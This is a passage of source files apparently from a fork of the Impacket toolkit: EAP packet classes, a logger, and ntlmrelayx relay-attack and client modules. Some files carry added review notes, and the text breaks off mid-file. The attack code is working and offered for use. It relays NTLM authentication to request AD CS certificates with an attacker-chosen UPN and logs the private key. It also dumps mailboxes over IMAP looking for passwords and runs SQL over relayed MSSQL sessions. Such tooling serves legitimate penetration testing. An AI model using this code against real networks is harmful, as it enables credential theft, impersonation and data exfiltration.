--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/dcerpc/v5/dcom/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/eap.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # EAP packets
11 | #
12 | # Author:
13 | # Aureliano Calvo
14 | #
15 |
16 | from impacket.helper import ProtocolPacket, Byte, Word, Long, ThreeBytesBigEndian
17 |
# EtherType assigned to IEEE 802.1X (EAP over LAN) frames.
DOT1X_AUTHENTICATION = 0x888E
19 |
class EAPExpanded(ProtocolPacket):
    """EAP expanded data according to RFC 3748, section 5.7"""

    # Vendor id / vendor type pair for Wi-Fi Alliance Simple Config.
    WFA_SMI = 0x00372a
    SIMPLE_CONFIG = 0x00000001

    # 7 header bytes: presumably 3 for vendor_id plus 4 for vendor_type.
    header_size = 7
    tail_size = 0

    # NOTE(review): the first argument of each field helper looks like the
    # byte offset in the header and ">" like big-endian; confirm in impacket.helper.
    vendor_id = ThreeBytesBigEndian(0)
    vendor_type = Long(3, ">")
31 |
class EAPR(ProtocolPacket):
    """It represents a request or a response in EAP (codes 1 and 2)"""

    # Values of the type field: Identity and Expanded.
    IDENTITY = 0x01
    EXPANDED = 0xfe

    header_size = 1
    tail_size = 0

    # Single header byte holding the EAP type.
    # NOTE(review): Byte(0) presumably means "one byte at offset 0"; confirm in impacket.helper.
    type = Byte(0)
42 |
class EAP(ProtocolPacket):
    """EAP packet header: code, identifier and length (4 bytes)."""

    # Values of the code field.
    REQUEST = 0x01
    RESPONSE = 0x02
    SUCCESS = 0x03
    FAILURE = 0x04

    header_size = 4
    tail_size = 0

    # NOTE(review): the first argument of each field helper looks like the
    # byte offset in the header and ">" like big-endian; confirm in impacket.helper.
    code = Byte(0)
    identifier = Byte(1)
    length = Word(2, ">")
55 |
class EAPOL(ProtocolPacket):
    """EAPOL frame header: version, packet type and body length (4 bytes).

    NOTE(review): as with EAP above, `body_length` is only declared here;
    any bounds check against the real frame size has to happen in
    ProtocolPacket or in the caller (not visible in this file).
    """

    # Values of the `packet_type` field.
    EAP_PACKET = 0x00
    EAPOL_START = 0x01
    EAPOL_LOGOFF = 0x02
    EAPOL_KEY = 0x03
    EAPOL_ENCAPSULATED_ASF_ALERT = 0x04

    # Value for the `version` field.
    DOT1X_VERSION = 0x01

    header_size = 4
    tail_size = 0

    version = Byte(0)
    packet_type = Byte(1)
    # Two-byte field at offset 2; ">" presumably means big-endian.
    body_length = Word(2, ">")
71 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/logger.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # This logger is intended to be used by impacket instead
11 | # of printing directly. This will allow other libraries to use their
12 | # custom logging implementation.
13 | #
14 |
15 | import logging
16 | import sys
17 |
18 | # This module can be used by scripts using the Impacket library
19 | # in order to configure the root logger to output events
20 | # generated by the library with a predefined format
21 |
22 | # If the scripts want to generate log entries, they can write
23 | # directly to the root logger (logging.info, debug, etc).
24 |
class ImpacketFormatter(logging.Formatter):
    '''
    Formatter that puts a severity marker in front of every message.

    The marker is stored on the record as the custom attribute 'bullet':
    '[*]' for INFO, '[+]' for DEBUG, '[!]' for WARNING and '[-]' for every
    other level. The message text is emitted as-is; this formatter does not
    escape control characters, so a message built from remote data that
    contains line breaks will span several output lines.
    '''
    def __init__(self):
        # Second positional argument is datefmt; None keeps the default.
        logging.Formatter.__init__(self, '%(bullet)s %(message)s', None)

    def format(self, record):
        markers = {
            logging.INFO: '[*]',
            logging.DEBUG: '[+]',
            logging.WARNING: '[!]',
        }
        # Anything not listed above (ERROR, CRITICAL, custom levels) gets '[-]'.
        record.bullet = markers.get(record.levelno, '[-]')
        return logging.Formatter.format(self, record)
43 |
class ImpacketFormatterTimeStamp(ImpacketFormatter):
    '''
    Same severity markers as ImpacketFormatter, with a bracketed timestamp
    placed in front of them.
    '''
    def __init__(self):
        layout = '[%(asctime)-15s] %(bullet)s %(message)s'
        logging.Formatter.__init__(self, layout, None)

    def formatTime(self, record, datefmt=None):
        # The datefmt argument is not forwarded: the timestamp always uses
        # the fixed layout below.
        fixed_layout = "%Y-%m-%d %H:%M:%S"
        return ImpacketFormatter.formatTime(self, record, datefmt=fixed_layout)
53 |
def init(ts=False):
    """
    Attach a stdout handler with an Impacket formatter to the root logger
    and set the root logger level to INFO.

    ts -- when true, use ImpacketFormatterTimeStamp so every line carries a
          timestamp; otherwise use ImpacketFormatter.

    A handler is added on every call, so calling this more than once makes
    each message appear once per call.
    """
    stdout_handler = logging.StreamHandler(sys.stdout)
    formatter = ImpacketFormatterTimeStamp() if ts else ImpacketFormatter()
    stdout_handler.setFormatter(formatter)

    root_logger = logging.getLogger()
    root_logger.addHandler(stdout_handler)
    root_logger.setLevel(logging.INFO)
63 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Protocol Attack Base Class definition
11 | # Defines a base class for all attacks + loads all available modules
12 | #
13 | # Author:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | import os, sys
18 | import pkg_resources
19 | from impacket import LOG
20 | from threading import Thread
21 |
22 | PROTOCOL_ATTACKS = {}
23 |
24 | # Base class for Protocol Attacks for different protocols (SMB, MSSQL, etc)
25 | # Besides using this base class you need to define one global variable when
26 | # writing a plugin for protocol clients:
27 | # PROTOCOL_ATTACK_CLASS = ""
28 | # or (to support multiple classes in one file)
29 | # PROTOCOL_ATTACK_CLASSES = ["", ""]
30 | # These classes must have the attribute PLUGIN_NAMES which is a list of protocol names
31 | # that will be matched later with the relay targets (e.g. SMB, LDAP, etc)
class ProtocolAttack(Thread):
    """
    Base thread class for the per-protocol attack plugins.

    Subclasses override PLUGIN_NAMES and run(). The constructor stores the
    configuration object and the protocol client, and keeps only the second
    '/'-separated component of `username`; a value without a '/' raises
    IndexError.
    """
    PLUGIN_NAMES = ['PROTOCOL']

    def __init__(self, config, client, username):
        Thread.__init__(self)
        # Daemon threads do not keep the interpreter alive on exit.
        self.daemon = True
        self.config, self.client = config, client
        # By default only the part after the domain is kept.
        name_parts = username.split('/')
        self.username = name_parts[1]

    def run(self):
        # Placeholder: concrete plugins are expected to replace this method.
        raise RuntimeError('Virtual Function')
45 |
# Plugin discovery, executed when this package is imported: every '.py' file
# in the 'attacks' package directory whose name contains no '__' is imported,
# and the classes it names are registered in PROTOCOL_ATTACKS under each of
# their PLUGIN_NAMES (a later module overwrites an earlier one that uses the
# same name).
#
# NOTE(review): importing a module runs its top-level code, so the contents
# of this directory are trusted implicitly. Anyone who can write a .py file
# into the installed package gets code execution on the next import.
for file in pkg_resources.resource_listdir('impacket.examples.ntlmrelayx', 'attacks'):
    if file.find('__') >= 0 or file.endswith('.py') is False:
        continue
    # This seems to be None in some case (py3 only)
    # __spec__ is py3 only though, but I haven't seen this being None on py2
    # so it should cover all cases.
    # NOTE(review): if __spec__ exists but is None, `.name` raises
    # AttributeError, which the handler below does not catch.
    try:
        package = __spec__.name # Python 3
    except NameError:
        package = __package__ # Python 2
    __import__(package + '.' + os.path.splitext(file)[0])
    module = sys.modules[package + '.' + os.path.splitext(file)[0]]
    try:
        pluginClasses = set()
        try:
            if hasattr(module, 'PROTOCOL_ATTACK_CLASSES'):
                # Multiple classes
                for pluginClass in module.PROTOCOL_ATTACK_CLASSES:
                    pluginClasses.add(getattr(module, pluginClass))
            else:
                # Single class
                pluginClasses.add(getattr(module, getattr(module, 'PROTOCOL_ATTACK_CLASS')))
        except Exception as e:
            # A module that declares neither variable, or names a missing
            # class, is skipped; the reason is only visible at debug level.
            LOG.debug(e)
            pass

        for pluginClass in pluginClasses:
            for pluginName in pluginClass.PLUGIN_NAMES:
                LOG.debug('Protocol Attack %s loaded..' % pluginName)
                PROTOCOL_ATTACKS[pluginName] = pluginClass
    except Exception as e:
        # Registration errors are also reported at debug level only.
        LOG.debug(str(e))
78 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/dcsyncattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # HTTP Attack Class
11 | # HTTP protocol relay attack
12 | #
13 | # Authors:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
18 | from impacket.examples.secretsdump import RemoteOperations, SAMHashes, NTDSHashes
19 |
20 | PROTOCOL_ATTACK_CLASS = "DCSYNCAttack"
21 |
class DCSYNCAttack(ProtocolAttack):
    """
    Attack class registered under the DCSYNC plugin name.

    run() returns immediately, so this class performs no action of its own.
    The RemoteOperations, SAMHashes and NTDSHashes names imported at the top
    of this file are not referenced by this class.
    """
    PLUGIN_NAMES = ["DCSYNC"]
    def run(self):
        # No work is done here; any behaviour tied to the DCSYNC name must
        # live outside this class (not visible in this file).
        return
32 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # HTTP Attack Class
11 | # HTTP protocol relay attack
12 | #
13 | # Authors:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | # Ex Android Dev (@ExAndroidDev)
17 |
18 | from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
19 | from impacket.examples.ntlmrelayx.attacks.httpattacks.adcsattack import ADCSAttack
20 |
21 | PROTOCOL_ATTACK_CLASS = "HTTPAttack"
22 |
23 |
class HTTPAttack(ProtocolAttack, ADCSAttack):
    """
    Default attack for the HTTP and HTTPS plugin names.

    When config.isADCSAttack is set, the work is delegated to
    ADCSAttack._run(). Otherwise a single GET for "/" is sent through
    self.client and the status line and body are printed to stdout.
    self.client is used here only through request() and getresponse().
    For anything more elaborate the original authors point to the SOCKS
    option of ntlmrelayx.
    """
    PLUGIN_NAMES = ["HTTP", "HTTPS"]

    def run(self):

        if self.config.isADCSAttack:
            ADCSAttack._run(self)
        else:
            # Default action: request the root page and print it.
            # NOTE(review): an older comment here mentioned writing the page
            # to a username-targetname.html file; the code below only prints.
            self.client.request("GET", "/")
            r1 = self.client.getresponse()
            print(r1.status, r1.reason)
            data1 = r1.read()
            # The raw body is printed without any filtering.
            print(data1)
46 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/httpattacks/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/impacket/examples/ntlmrelayx/attacks/httpattacks/__init__.py
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # AD CS relay attack
11 | #
12 | # Authors:
13 | # Ex Android Dev (@ExAndroidDev)
14 | # Tw1sm (@Tw1sm)
15 |
16 | import re
17 | import base64
18 | from OpenSSL import crypto
19 |
20 | from impacket import LOG
21 |
22 | # cache already attacked clients
23 | ELEVATED = []
24 |
25 |
class ADCSAttack:
    """
    Mixin that requests a certificate from an AD CS web-enrollment endpoint
    through an HTTP client that is already authenticated.

    The host class has to provide self.username, self.client (request() and
    getresponse()) and self.config (template, altName); nothing in this
    class sets them.

    Defender notes, based on what this code sends:
      * Traffic is a POST to /certsrv/certfnsh.asp followed by a GET to
        /certsrv/certnew.cer?ReqID=<id>, both with the fixed User-Agent
        string defined in _run(). Web-server and CA issuance logs are the
        places where this shows up.
      * Requiring HTTPS with Extended Protection for Authentication on the
        web-enrollment endpoints, or disabling NTLM for them, is the usual
        hardening against relayed authentication reaching this endpoint.
    """

    def _run(self):
        # A fresh 4096-bit RSA key is generated on every call, before the
        # already-processed check below.
        key = crypto.PKey()
        key.generate_key(crypto.TYPE_RSA, 4096)

        # ELEVATED is a module-level list shared by all instances.
        if self.username in ELEVATED:
            LOG.info('Skipping user %s since attack was already performed' % self.username)
            return

        # Without an explicit template, account names ending in '$' get
        # "Machine" and all others "User".
        current_template = self.config.template
        if current_template is None:
            current_template = "Machine" if self.username.endswith("$") else "User"

        csr = self.generate_csr(key, self.username, self.config.altName)
        # Hand-rolled form encoding of the PEM text: line breaks removed,
        # '+' percent-encoded, spaces turned into '+'.
        csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
        LOG.info("CSR generated!")

        certAttrib = self.generate_certattributes(current_template, self.config.altName)

        # template and altName are inserted into the form body without any
        # further escaping.
        data = "Mode=newreq&CertRequest=%s&CertAttrib=%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (csr, certAttrib)

        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": len(data)
        }

        LOG.info("Getting certificate...")

        self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
        # The user is recorded as processed as soon as the request is sent,
        # whatever the response turns out to be.
        ELEVATED.append(self.username)
        response = self.client.getresponse()

        if response.status != 200:
            LOG.error("Error getting certificate! Make sure you have entered valid certiface template.")
            return

        content = response.read()
        # The request ID is scraped from the HTML of the response.
        found = re.findall(r'location="certnew.cer\?ReqID=(.*?)&', content.decode())
        if len(found) == 0:
            LOG.error("Error obtaining certificate!")
            return

        certificate_id = found[0]

        # certificate_id comes from the server response and is appended to
        # the path unchanged.
        self.client.request("GET", "/certsrv/certnew.cer?ReqID=" + certificate_id)
        response = self.client.getresponse()

        LOG.info("GOT CERTIFICATE! ID %s" % certificate_id)
        certificate = response.read().decode()

        certificate_store = self.generate_pfx(key, certificate)
        # NOTE(review): the PKCS#12 blob holds the private key, is exported
        # without a passphrase (see generate_pfx) and is written to the log
        # at INFO level. Anyone who can read the log output can reuse it, so
        # the log has to be handled as credential material.
        LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))

        if self.config.altName:
            LOG.info("This certificate can also be used for user : {}".format(self.config.altName))

    def generate_csr(self, key, CN, altName):
        """Build a PEM-encoded CSR for CN, signed with `key` using SHA-256.

        When altName is truthy, a non-critical subjectAltName extension with
        an otherName entry (OID 1.3.6.1.4.1.311.20.2.3, UTF8 value) is added.
        """
        LOG.info("Generating CSR...")
        req = crypto.X509Req()
        req.get_subject().CN = CN

        if altName:
            # bytes %-formatting with %b needs Python 3.5 or later.
            req.add_extensions([crypto.X509Extension(b"subjectAltName", False, b"otherName:1.3.6.1.4.1.311.20.2.3;UTF8:%b" % altName.encode() )])


        req.set_pubkey(key)
        req.sign(key, "sha256")

        return crypto.dump_certificate_request(crypto.FILETYPE_PEM, req)

    def generate_pfx(self, key, certificate):
        """Bundle the PEM certificate and `key` into a PKCS#12 blob.

        export() is called without arguments, so no passphrase is supplied.
        NOTE(review): recent pyOpenSSL releases deprecate crypto.PKCS12 --
        confirm against the version this project pins.
        """
        certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
        p12 = crypto.PKCS12()
        p12.set_certificate(certificate)
        p12.set_privatekey(key)
        return p12.export()

    def generate_certattributes(self, template, altName):
        """Return the CertAttrib form value: the template name, plus a
        'SAN:upn=' line (separated by an encoded CR LF) when altName is set."""

        if altName:
            return "CertificateTemplate:{}%0d%0aSAN:upn={}".format(template, altName)
        return "CertificateTemplate:{}".format(template)
110 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/imapattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # IMAP Attack Class
11 | # IMAP protocol relay attack
12 | #
13 | # Authors:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | import re
18 | import os
19 | from impacket import LOG
20 | from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
21 |
22 | PROTOCOL_ATTACK_CLASS = "IMAPAttack"
23 |
class IMAPAttack(ProtocolAttack):
    """
    This is the default IMAP(s) attack. By default it searches the INBOX imap folder
    for messages with "password" in the header or body. Alternate keywords can be specified
    on the command line. For more advanced attacks, consider using the SOCKS feature.

    Reads from self.config: mailbox, dump_all, keyword, dump_max, lootdir.
    Matching messages are written as .eml files under lootdir; those files
    contain mail content in clear text and need to be protected accordingly.
    """
    PLUGIN_NAMES = ["IMAP", "IMAPS"]
    def run(self):
        # Default action: open the configured mailbox read-only and fall
        # back to INBOX when that fails.
        targetBox = self.config.mailbox
        result, data = self.client.select(targetBox,True) #True indicates readonly
        if result != 'OK':
            LOG.error('Could not open mailbox %s: %s' % (targetBox, data))
            LOG.info('Opening mailbox INBOX')
            targetBox = 'INBOX'
            result, data = self.client.select(targetBox,True) #True indicates readonly
        # The result of the fallback select is not checked before data[0]
        # is parsed as the message count.
        inboxCount = int(data[0])
        LOG.info('Found %s messages in mailbox %s' % (inboxCount, targetBox))
        #If we should not dump all, search for the keyword
        if not self.config.dump_all:
            # The keyword is wrapped in double quotes but not escaped.
            result, rawdata = self.client.search(None, 'OR', 'SUBJECT', '"%s"' % self.config.keyword, 'BODY', '"%s"' % self.config.keyword)
            #Check if search worked
            if result != 'OK':
                LOG.error('Search failed: %s' % rawdata)
                return
            dumpMessages = []
            #message IDs are separated by spaces
            for msgs in rawdata:
                dumpMessages += msgs.split(' ')
            # dump_max == 0 means "no limit".
            if self.config.dump_max != 0 and len(dumpMessages) > self.config.dump_max:
                dumpMessages = dumpMessages[:self.config.dump_max]
        else:
            #Dump all mails, up to the maximum number configured
            if self.config.dump_max == 0 or self.config.dump_max > inboxCount:
                dumpMessages = list(range(1, inboxCount+1))
            else:
                dumpMessages = list(range(1, self.config.dump_max+1))

        numMsgs = len(dumpMessages)
        if numMsgs == 0:
            LOG.info('No messages were found containing the search keywords')
        else:
            # This message mentions the keyword in the dump_all case as well.
            LOG.info('Dumping %d messages found by search for "%s"' % (numMsgs, self.config.keyword))
            for i, msgIndex in enumerate(dumpMessages):
                #Fetch the message
                result, rawMessage = self.client.fetch(msgIndex, '(RFC822)')
                if result != 'OK':
                    LOG.error('Could not fetch message with index %s: %s' % (msgIndex, rawMessage))
                    continue

                # Everything outside [a-zA-Z0-9_.-] becomes '_', so neither
                # name can add a path separator to the file name.
                mailboxName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', targetBox)
                textUserName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username)

                #Combine username with mailboxname and mail number
                # NOTE(review): in the search branch msgIndex comes from the
                # server's SEARCH reply and is not passed through the same
                # substitution -- confirm it can only ever be numeric before
                # it is used as part of a path.
                fileName = 'mail_' + textUserName + '-' + mailboxName + '_' + str(msgIndex) + '.eml'

                #Write it to the file
                with open(os.path.join(self.config.lootdir,fileName),'w') as of:
                    of.write(rawMessage[0][1])
                LOG.info('Done fetching message %d/%d' % (i+1,numMsgs))

        #Close connection cleanly
        self.client.logout()
88 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/attacks/mssqlattack.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # MSSQL Attack Class
11 | # MSSQL protocol relay attack
12 | #
13 | # Authors:
14 | # Alberto Solino (@agsolino)
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | # Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)
17 | #
18 | from impacket import LOG
19 | from impacket.examples.mssqlshell import SQLSHELL
20 | from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
21 |
22 | PROTOCOL_ATTACK_CLASS = "MSSQLAttack"
23 |
class MSSQLAttack(ProtocolAttack):
    """
    Attack class for the MSSQL plugin name.

    Runs each statement in config.queries on the relayed connection and
    prints the replies and rows; if no queries are configured and
    config.interactive is True, hands the connection to an interactive
    SQLSHELL instead. Statements are logged at INFO level before they are
    sent, so the log is a record of what was executed.
    """
    PLUGIN_NAMES = ["MSSQL"]
    def run(self):
        if self.config.queries is not None:
            for query in self.config.queries:
                LOG.info('Executing SQL: %s' % query)
                self.client.sql_query(query)
                self.client.printReplies()
                self.client.printRows()
        elif self.config.interactive is True:
            # Blocks until the interactive shell loop ends.
            shell = SQLSHELL(self.client)
            shell.cmdloop()
            return
        else:
            LOG.error('No SQL queries specified for MSSQL relay!')
39 |
40 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/clients/imaprelayclient.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # IMAP Protocol Client
11 | # IMAP client for relaying NTLMSSP authentication to mailservers, for example Exchange
12 | #
13 | # Author:
14 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
15 | # Alberto Solino (@agsolino)
16 | #
17 | import imaplib
18 | import base64
19 | from struct import unpack
20 |
21 | from impacket import LOG
22 | from impacket.examples.ntlmrelayx.clients import ProtocolClient
23 | from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED
24 | from impacket.ntlm import NTLMAuthChallenge
25 | from impacket.spnego import SPNEGO_NegTokenResp
26 |
27 | PROTOCOL_CLIENT_CLASSES = ["IMAPRelayClient","IMAPSRelayClient"]
28 |
class IMAPRelayClient(ProtocolClient):
    """
    Protocol client that carries an NTLM exchange over a plain IMAP
    connection (imaplib.IMAP4, default port 143).

    The client gives up in initConnection() when the server does not list
    AUTH=NTLM among its capabilities, so a server with NTLM authentication
    turned off for IMAP is not usable through this class.
    """
    PLUGIN_NAME = "IMAP"

    def __init__(self, serverConfig, target, targetPort = 143, extendedSecurity=True ):
        ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity)

    def initConnection(self):
        """Connect and check for NTLM support; returns True or False."""
        self.session = imaplib.IMAP4(self.targetHost,self.targetPort)
        # _new_tag() is a private imaplib method; the tag is reused for the
        # AUTHENTICATE command and for reading its tagged response.
        self.authTag = self.session._new_tag()
        LOG.debug('IMAP CAPABILITIES: %s' % str(self.session.capabilities))
        if 'AUTH=NTLM' not in self.session.capabilities:
            LOG.error('IMAP server does not support NTLM authentication!')
            return False
        return True

    def sendNegotiate(self,negotiateMessage):
        """Send AUTHENTICATE NTLM plus the base64 negotiate message.

        Returns the parsed NTLMAuthChallenge, or False when the server does
        not answer with a continuation. IndexError, KeyError and
        AttributeError raised while parsing are logged and re-raised.
        """
        negotiate = base64.b64encode(negotiateMessage)
        self.session.send('%s AUTHENTICATE NTLM%s' % (self.authTag,imaplib.CRLF))
        resp = self.session.readline().strip()
        if resp != '+':
            LOG.error('IMAP Client error, expected continuation (+), got %s ' % resp)
            return False
        else:
            self.session.send(negotiate + imaplib.CRLF)
        try:
            serverChallengeBase64 = self.session.readline().strip()[2:] #first two chars are the continuation and space char
            serverChallenge = base64.b64decode(serverChallengeBase64)
            challenge = NTLMAuthChallenge()
            challenge.fromString(serverChallenge)
            return challenge
        except (IndexError, KeyError, AttributeError):
            LOG.error('No NTLM challenge returned from IMAP server')
            raise

    def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
        """Send the authenticate message; returns (None, NT status code).

        serverChallenge is accepted but not used in this method.
        """
        # A first byte equal to SPNEGO_NEG_TOKEN_RESP means the blob is
        # wrapped in SPNEGO; only the inner ResponseToken is sent.
        if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
            respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
            token = respToken2['ResponseToken']
        else:
            token = authenticateMessageBlob
        auth = base64.b64encode(token)
        self.session.send(auth + imaplib.CRLF)
        # _get_tagged_response() is a private imaplib method.
        typ, data = self.session._get_tagged_response(self.authTag)
        if typ == 'OK':
            # imaplib tracks its own state; set it so later commands are allowed.
            self.session.state = 'AUTH'
            return None, STATUS_SUCCESS
        else:
            LOG.error('IMAP: %s' % ' '.join(data))
            return None, STATUS_ACCESS_DENIED

    def killConnection(self):
        """Log out and drop the session, if there is one."""
        if self.session is not None:
            self.session.logout()
            self.session = None

    def keepAlive(self):
        # Send a NOOP
        self.session.noop()
87 |
class IMAPSRelayClient(IMAPRelayClient):
    """
    IMAP-over-TLS variant of IMAPRelayClient (imaplib.IMAP4_SSL, default
    port 993). Only the constructor and initConnection() differ.
    """
    PLUGIN_NAME = "IMAPS"

    def __init__(self, serverConfig, targetHost, targetPort = 993, extendedSecurity=True ):
        # Calls the ProtocolClient constructor directly rather than
        # IMAPRelayClient.__init__.
        ProtocolClient.__init__(self, serverConfig, targetHost, targetPort, extendedSecurity)

    def initConnection(self):
        """Connect over TLS and check for NTLM support; returns True or False."""
        # NOTE(review): no ssl_context is passed, so certificate and host
        # name checking follow imaplib's default for the running Python
        # version -- confirm whether the peer is actually verified.
        self.session = imaplib.IMAP4_SSL(self.targetHost,self.targetPort)
        self.authTag = self.session._new_tag()
        LOG.debug('IMAP CAPABILITIES: %s' % str(self.session.capabilities))
        if 'AUTH=NTLM' not in self.session.capabilities:
            LOG.error('IMAP server does not support NTLM authentication!')
            return False
        return True
102 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/clients/smtprelayclient.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # SMTP Protocol Client
11 | # SMTP client for relaying NTLMSSP authentication to mailservers, for example Exchange
12 | #
13 | # Author:
14 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
15 | # Alberto Solino (@agsolino)
16 | #
17 | import smtplib
18 | import base64
19 | from struct import unpack
20 |
21 | from impacket import LOG
22 | from impacket.examples.ntlmrelayx.clients import ProtocolClient
23 | from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED
24 | from impacket.ntlm import NTLMAuthChallenge
25 | from impacket.spnego import SPNEGO_NegTokenResp
26 |
27 | PROTOCOL_CLIENT_CLASSES = ["SMTPRelayClient"]
28 |
class SMTPRelayClient(ProtocolClient):
    """
    Protocol client that carries an NTLM exchange over SMTP
